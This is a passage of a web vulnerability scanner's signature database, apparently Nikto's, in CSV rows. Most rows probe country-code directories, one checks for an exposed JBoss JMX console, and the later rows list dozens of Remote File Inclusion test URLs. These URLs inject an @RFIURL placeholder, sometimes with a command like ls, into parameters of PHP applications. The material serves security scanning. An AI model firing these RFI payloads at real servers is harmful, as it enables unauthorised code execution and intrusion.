"003696","","1","/hn/","GET","200","","","","","This might be interesting: potential country code (Honduras)","","" "003697","","1","/hk/","GET","200","","","","","This might be interesting: potential country code (Hong Kong)","","" "003698","","1","/hu/","GET","200","","","","","This might be interesting: potential country code (Hungary)","","" "003699","","1","/is/","GET","200","","","","","This might be interesting: potential country code (Iceland)","","" "003700","","1","/in/","GET","200","","","","","This might be interesting: potential country code (India)","","" "003701","","1","/id/","GET","200","","","","","This might be interesting: potential country code (Indonesia)","","" "003702","","1","/ir/","GET","200","","","","","This might be interesting: potential country code (Islamic Republic Of Iran)","","" "003703","","1","/iq/","GET","200","","","","","This might be interesting: potential country code (Iraq)","","" "003704","","1","/ie/","GET","200","","","","","This might be interesting: potential country code (Ireland)","","" "003705","","1","/im/","GET","200","","","","","This might be interesting: potential country code (Isle Of Man)","","" "003706","","1","/il/","GET","200","","","","","This might be interesting: potential country code (Israel)","","" "003707","","1","/it/","GET","200","","","","","This might be interesting: potential country code (Italy)","","" "003708","","1","/jm/","GET","200","","","","","This might be interesting: potential country code (Jamaica)","","" "003709","","1","/jp/","GET","200","","","","","This might be interesting: potential country code (Japan)","","" "003710","","1","/je/","GET","200","","","","","This might be interesting: potential country code (Jersey)","","" "003711","","1","/jo/","GET","200","","","","","This might be interesting: potential country code (Jordan)","","" "003712","","1","/kz/","GET","200","","","","","This might be interesting: potential country code (Kazakhstan)","","" "003713","","1","/ke/","GET","200","","","","","This might be interesting: potential country code (Kenya)","","" "003714","","1","/ki/","GET","200","","","","","This might be interesting: potential country code (Kiribati)","","" "003715","","1","/kp/","GET","200","","","","","This might be interesting: potential country code (Democratic People's Republic Of Korea)","","" "003716","","1","/kr/","GET","200","","","","","This might be interesting: potential country code (Republic Of Korea)","","" "003717","","1","/kw/","GET","200","","","","","This might be interesting: potential country code (Kuwait)","","" "003718","","1","/kg/","GET","200","","","","","This might be interesting: potential country code (Kyrgyzstan)","","" "003719","","1","/la/","GET","200","","","","","This might be interesting: potential country code (Lao People's Democratic Republic)","","" "003720","","1","/lv/","GET","200","","","","","This might be interesting: potential country code (Latvia)","","" "003721","","1","/lb/","GET","200","","","","","This might be interesting: potential country code (Lebanon)","","" "003722","","1","/ls/","GET","200","","","","","This might be interesting: potential country code (Lesotho)","","" "003723","","1","/lr/","GET","200","","","","","This might be interesting: potential country code (Liberia)","","" "003724","","1","/ly/","GET","200","","","","","This might be interesting: potential country code (Libyan Arab Jamahiriya)","","" "003725","","1","/li/","GET","200","","","","","This might be interesting: potential country code (Liechtenstein)","","" "003726","","1","/lt/","GET","200","","","","","This might be interesting: potential country code (Lithuania)","","" "003727","","1","/lu/","GET","200","","","","","This might be interesting: potential country code (Luxembourg)","","" "003728","","1","/mo/","GET","200","","","","","This might be interesting: potential country code (Macao)","","" "003729","","1","/mk/","GET","200","","","","","This might be interesting: potential country code (Macedonia)","","" "003730","","1","/mg/","GET","200","","","","","This might be interesting: potential country code (Madagascar)","","" "003731","","1","/mw/","GET","200","","","","","This might be interesting: potential country code (Malawi)","","" "003732","","1","/my/","GET","200","","","","","This might be interesting: potential country code (Malaysia)","","" "003733","","1","/mv/","GET","200","","","","","This might be interesting: potential country code (Maldives)","","" "003734","","1","/ml/","GET","200","","","","","This might be interesting: potential country code (Mali)","","" "003735","","1","/mt/","GET","200","","","","","This might be interesting: potential country code (Malta)","","" "003736","","1","/mh/","GET","200","","","","","This might be interesting: potential country code (Marshall Islands)","","" "003737","","1","/mq/","GET","200","","","","","This might be interesting: potential country code (Martinique)","","" "003738","","1","/mr/","GET","200","","","","","This might be interesting: potential country code (Mauritania)","","" "003739","","1","/mu/","GET","200","","","","","This might be interesting: potential country code (Mauritius)","","" "003740","","1","/yt/","GET","200","","","","","This might be interesting: potential country code (Mayotte)","","" "003741","","1","/mx/","GET","200","","","","","This might be interesting: potential country code (Mexico)","","" "003742","","1","/fm/","GET","200","","","","","This might be interesting: potential country code (Federated States Of Micronesia)","","" "003743","","1","/md/","GET","200","","","","","This might be interesting: potential country code (Republic Of Moldova)","","" "003744","","1","/mc/","GET","200","","","","","This might be interesting: potential country code (Monaco)","","" "003745","","1","/mn/","GET","200","","","","","This might be interesting: potential country code (Mongolia)","","" "003746","","1","/me/","GET","200","","","","","This might be interesting: potential country code (Montenegro)","","" "003747","","1","/ms/","GET","200","","","","","This might be interesting: potential country code (Montserrat)","","" "003748","","1","/ma/","GET","200","","","","","This might be interesting: potential country code (Morocco)","","" "003749","","1","/mz/","GET","200","","","","","This might be interesting: potential country code (Mozambique)","","" "003750","","1","/mm/","GET","200","","","","","This might be interesting: potential country code (Myanmar)","","" "003751","","1","/na/","GET","200","","","","","This might be interesting: potential country code (Namibia)","","" "003752","","1","/nr/","GET","200","","","","","This might be interesting: potential country code (Nauru)","","" "003753","","1","/np/","GET","200","","","","","This might be interesting: potential country code (Nepal)","","" "003754","","1","/nl/","GET","200","","","","","This might be interesting: potential country code (Netherlands)","","" "003755","","1","/an/","GET","200","","","","","This might be interesting: potential country code (Netherlands Antilles)","","" "003756","","1","/nc/","GET","200","","","","","This might be interesting: potential country code (New Caledonia)","","" "003757","","1","/nz/","GET","200","","","","","This might be interesting: potential country code (New Zealand)","","" "003758","","1","/ni/","GET","200","","","","","This might be interesting: potential country code (Nicaragua)","","" "003759","","1","/ne/","GET","200","","","","","This might be interesting: potential country code (Niger)","","" "003760","","1","/ng/","GET","200","","","","","This might be interesting: potential country code (Nigeria)","","" "003761","","1","/nu/","GET","200","","","","","This might be interesting: potential country code (Niue)","","" "003762","","1","/nf/","GET","200","","","","","This might be interesting: potential country code (Norfolk Island)","","" "003763","","1","/mp/","GET","200","","","","","This might be interesting: potential country code (Northern Mariana Islands)","","" "003764","","1","/no/","GET","200","","","","","This might be interesting: potential country code (Norway)","","" "003765","","1","/om/","GET","200","","","","","This might be interesting: potential country code (Oman)","","" "003766","","1","/pk/","GET","200","","","","","This might be interesting: potential country code (Pakistan)","","" "003767","","1","/pw/","GET","200","","","","","This might be interesting: potential country code (Palau)","","" "003768","","1","/ps/","GET","200","","","","","This might be interesting: potential country code (Palestinian Territory)","","" "003769","","1","/pa/","GET","200","","","","","This might be interesting: potential country code (Panama)","","" "003770","","1","/pg/","GET","200","","","","","This might be interesting: potential country code (Papua New Guinea)","","" "003771","","1","/py/","GET","200","","","","","This might be interesting: potential country code (Paraguay)","","" "003772","","1","/pe/","GET","200","","","","","This might be interesting: potential country code (Peru)","","" "003773","","1","/ph/","GET","200","","","","","This might be interesting: potential country code (Philippines)","","" "003774","","1","/pn/","GET","200","","","","","This might be interesting: potential country code (Pitcairn)","","" "003775","","1","/pl/","GET","200","","","","","This might be interesting: potential country code (Poland)","","" "003776","","1","/pt/","GET","200","","","","","This might be interesting: potential country code (Portugal)","","" "003777","","1","/pr/","GET","200","","","","","This might be interesting: potential country code (Puerto Rico)","","" "003778","","1","/qa/","GET","200","","","","","This might be interesting: potential country code (Qatar)","","" "003779","","1","/re/","GET","200","","","","","This might be interesting: potential country code (RÉunion)","","" "003780","","1","/ro/","GET","200","","","","","This might be interesting: potential country code (Romania)","","" "003781","","1","/ru/","GET","200","","","","","This might be interesting: potential country code (Russian Federation)","","" "003782","","1","/rw/","GET","200","","","","","This might be interesting: potential country code (Rwanda)","","" "003783","","1","/bl/","GET","200","","","","","This might be interesting: potential country code (Saint BarthÉlemy)","","" "003784","","1","/sh/","GET","200","","","","","This might be interesting: potential country code (Saint Helena)","","" "003785","","1","/kn/","GET","200","","","","","This might be interesting: potential country code (Saint Kitts And Nevis)","","" "003786","","1","/lc/","GET","200","","","","","This might be interesting: potential country code (Saint Lucia)","","" "003787","","1","/mf/","GET","200","","","","","This might be interesting: potential country code (Saint Martin)","","" "003788","","1","/pm/","GET","200","","","","","This might be interesting: potential country code (Saint Pierre And Miquelon)","","" "003789","","1","/vc/","GET","200","","","","","This might be interesting: potential country code (Saint Vincent And The Grenadines)","","" "003790","","1","/ws/","GET","200","","","","","This might be interesting: potential country code (Samoa)","","" "003791","","1","/sm/","GET","200","","","","","This might be interesting: potential country code (San Marino)","","" "003792","","1","/st/","GET","200","","","","","This might be interesting: potential country code (Sao Tome And Principe)","","" "003793","","1","/sa/","GET","200","","","","","This might be interesting: potential country code (Saudi Arabia)","","" "003794","","1","/sn/","GET","200","","","","","This might be interesting: potential country code (Senegal)","","" "003795","","1","/rs/","GET","200","","","","","This might be interesting: potential country code (Serbia)","","" "003796","","1","/sc/","GET","200","","","","","This might be interesting: potential country code (Seychelles)","","" "003797","","1","/sl/","GET","200","","","","","This might be interesting: potential country code (Sierra Leone)","","" "003798","","1","/sg/","GET","200","","","","","This might be interesting: potential country code (Singapore)","","" "003799","","1","/sk/","GET","200","","","","","This might be interesting: potential country code (Slovakia)","","" "003800","","1","/si/","GET","200","","","","","This might be interesting: potential country code (Slovenia)","","" "003801","","1","/sb/","GET","200","","","","","This might be interesting: potential country code (Solomon Islands)","","" "003802","","1","/so/","GET","200","","","","","This might be interesting: potential country code (Somalia)","","" "003803","","1","/za/","GET","200","","","","","This might be interesting: potential country code (South Africa)","","" "003804","","1","/gs/","GET","200","","","","","This might be interesting: potential country code (South Georgia And The South Sandwich Islands)","","" "003805","","1","/es/","GET","200","","","","","This might be interesting: potential country code (Spain)","","" "003806","","1","/lk/","GET","200","","","","","This might be interesting: potential country code (Sri Lanka)","","" "003807","","1","/sd/","GET","200","","","","","This might be interesting: potential country code (Sudan)","","" "003808","","1","/sr/","GET","200","","","","","This might be interesting: potential country code (Suriname)","","" "003809","","1","/sj/","GET","200","","","","","This might be interesting: potential country code (Svalbard And Jan Mayen)","","" "003810","","1","/sz/","GET","200","","","","","This might be interesting: potential country code (Swaziland)","","" "003811","","1","/se/","GET","200","","","","","This might be interesting: potential country code (Sweden)","","" "003812","","1","/ch/","GET","200","","","","","This might be interesting: potential country code (Switzerland)","","" "003813","","1","/sy/","GET","200","","","","","This might be interesting: potential country code (Syrian Arab Republic)","","" "003814","","1","/tw/","GET","200","","","","","This might be interesting: potential country code (Taiwan)","","" "003815","","1","/tj/","GET","200","","","","","This might be interesting: potential country code (Tajikistan)","","" "003816","","1","/tz/","GET","200","","","","","This might be interesting: potential country code (United Republic Of Tanzania)","","" "003817","","1","/th/","GET","200","","","","","This might be interesting: potential country code (Thailand)","","" "003818","","1","/tl/","GET","200","","","","","This might be interesting: potential country code (Timor-leste)","","" "003819","","1","/tg/","GET","200","","","","","This might be interesting: potential country code (Togo)","","" "003820","","1","/tk/","GET","200","","","","","This might be interesting: potential country code (Tokelau)","","" "003821","","1","/to/","GET","200","","","","","This might be interesting: potential country code (Tonga)","","" "003822","","1","/tt/","GET","200","","","","","This might be interesting: potential country code (Trinidad And Tobago)","","" "003823","","1","/tn/","GET","200","","","","","This might be interesting: potential country code (Tunisia)","","" "003824","","1","/tr/","GET","200","","","","","This might be interesting: potential country code (Turkey)","","" "003825","","1","/tm/","GET","200","","","","","This might be interesting: potential country code (Turkmenistan)","","" "003826","","1","/tc/","GET","200","","","","","This might be interesting: potential country code (Turks And Caicos Islands)","","" "003827","","1","/tv/","GET","200","","","","","This might be interesting: potential country code (Tuvalu)","","" "003828","","1","/ug/","GET","200","","","","","This might be interesting: potential country code (Uganda)","","" "003829","","1","/ua/","GET","200","","","","","This might be interesting: potential country code (Ukraine)","","" "003830","","1","/ae/","GET","200","","","","","This might be interesting: potential country code (United Arab Emirates)","","" "003831","","1","/gb/","GET","200","","","","","This might be interesting: potential country code (United Kingdom)","","" "003832","","1","/us/","GET","200","","","","","This might be interesting: potential country code (United States)","","" "003833","","1","/um/","GET","200","","","","","This might be interesting: potential country code (United States Minor Outlying Islands)","","" "003834","","1","/uy/","GET","200","","","","","This might be interesting: potential country code (Uruguay)","","" "003835","","1","/uz/","GET","200","","","","","This might be interesting: potential country code (Uzbekistan)","","" "003836","","1","/vu/","GET","200","","","","","This might be interesting: potential country code (Vanuatu)","","" "003837","","1","/ve/","GET","200","","","","","This might be interesting: potential country code (Venezuela)","","" "003838","","1","/vn/","GET","200","","","","","This might be interesting: potential country code (Viet Nam)","","" "003839","","1","/vg/","GET","200","","","","","This might be interesting: potential country code (British Virgin Islands)","","" "003840","","1","/vi/","GET","200","","","","","This might be interesting: potential country code (U.S. Virgin Islands)","","" "003841","","1","/wf/","GET","200","","","","","This might be interesting: potential country code (Wallis And Futuna)","","" "003842","","1","/eh/","GET","200","","","","","This might be interesting: potential country code (Western Sahara)","","" "003843","","1","/ye/","GET","200","","","","","This might be interesting: potential country code (Yemen)","","" "003844","","1","/zm/","GET","200","","","","","This might be interesting: potential country code (Zambia)","","" "003845","","1","/zw/","GET","200","","","","","This might be interesting: potential country code (Zimbabwe)","","" "003846","","3be","/jmx-console/","GET","ObjectName","","","","","JBoss JMX Agent View found.","","" "003848","","1","/www/2","GET","200","","","","","This might be interesting.","","" "003849","https://gist.github.com/mubix/5d269c686584875015a2","c","/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003850","https://gist.github.com/mubix/5d269c686584875015a2","c","/123flashchat.php?e107path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003851","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003852","https://gist.github.com/mubix/5d269c686584875015a2","c","/22_ultimate/templates/header.php?mainpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003853","https://gist.github.com/mubix/5d269c686584875015a2","c","/22_ultimate/templates/header.php?mainpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003854","https://gist.github.com/mubix/5d269c686584875015a2","c","/?_CONFIG[files][functions_page]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003855","https://gist.github.com/mubix/5d269c686584875015a2","c","/?npage=-1&content_dir=@RFIURL%00&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003856","https://gist.github.com/mubix/5d269c686584875015a2","c","/?npage=1&content_dir=@RFIURL%00&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003857","https://gist.github.com/mubix/5d269c686584875015a2","c","/?show=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003858","https://gist.github.com/mubix/5d269c686584875015a2","c","/A-Blog/navigation/donation.php?navigation_start=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003859","https://gist.github.com/mubix/5d269c686584875015a2","c","/A-Blog/navigation/latestnews.php?navigation_start=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003860","https://gist.github.com/mubix/5d269c686584875015a2","c","/A-Blog/navigation/links.php?navigation_start=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003861","https://gist.github.com/mubix/5d269c686584875015a2","c","/A-Blog/navigation/search.php?navigation_end=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003862","https://gist.github.com/mubix/5d269c686584875015a2","c","/A-Blog/sources/myaccount.php?open_box=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003863","https://gist.github.com/mubix/5d269c686584875015a2","c","/ACGVnews/header.php?PathNews=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003864","https://gist.github.com/mubix/5d269c686584875015a2","c","/ATutor/documentation/common/frame_toc.php?section=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003865","https://gist.github.com/mubix/5d269c686584875015a2","c","/ATutor/documentation/common/search.php?section=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003866","https://gist.github.com/mubix/5d269c686584875015a2","c","/ATutor/documentation/common/vitals.inc.php?req_lang=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003867","https://gist.github.com/mubix/5d269c686584875015a2","c","/ATutor/include/classes/module/module.class.php?row[dir_name]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003868","https://gist.github.com/mubix/5d269c686584875015a2","c","/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003869","https://gist.github.com/mubix/5d269c686584875015a2","c","/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003870","https://gist.github.com/mubix/5d269c686584875015a2","c","/Administration/Includes/configureText.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003871","https://gist.github.com/mubix/5d269c686584875015a2","c","/Administration/Includes/contentHome.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003872","https://gist.github.com/mubix/5d269c686584875015a2","c","/Administration/Includes/deleteContent.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003873","https://gist.github.com/mubix/5d269c686584875015a2","c","/Administration/Includes/deleteUser.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003874","https://gist.github.com/mubix/5d269c686584875015a2","c","/Administration/Includes/userHome.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003875","https://gist.github.com/mubix/5d269c686584875015a2","c","/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003876","https://gist.github.com/mubix/5d269c686584875015a2","c","/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003877","https://gist.github.com/mubix/5d269c686584875015a2","c","/BE_config.php?_PSL[classdir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003878","https://gist.github.com/mubix/5d269c686584875015a2","c","/BPNEWS/bn_smrep1.php?bnrep=@RFIURL?&","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003879","https://gist.github.com/mubix/5d269c686584875015a2","c","/Base/Application.php?pear_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003880","https://gist.github.com/mubix/5d269c686584875015a2","c","/Bcwb_PATH/dcontent/default.css.php?root_path_admin=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003881","https://gist.github.com/mubix/5d269c686584875015a2","c","/Bcwb_PATH/include/startup.inc.php?root_path_admin=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003882","https://gist.github.com/mubix/5d269c686584875015a2","c","/Bcwb_PATH/system/default.css.php?root_path_admin=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003883","https://gist.github.com/mubix/5d269c686584875015a2","c","/Beautifier/Core.php?BEAUT_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003884","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules//Module/Module.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003885","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003886","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003887","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003888","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003889","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003890","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003891","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/EditProfileModule/external.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003892","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003893","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003894","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003895","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003896","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003897","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003898","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003899","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003900","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003901","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003902","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003903","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003904","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003905","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003906","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003907","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003908","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003909","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003910","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003911","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003912","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003913","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003914","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003915","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003916","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/MyNetworksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003917","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003918","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003919","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003920","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003921","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003922","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003923","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003924","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003925","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003926","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" 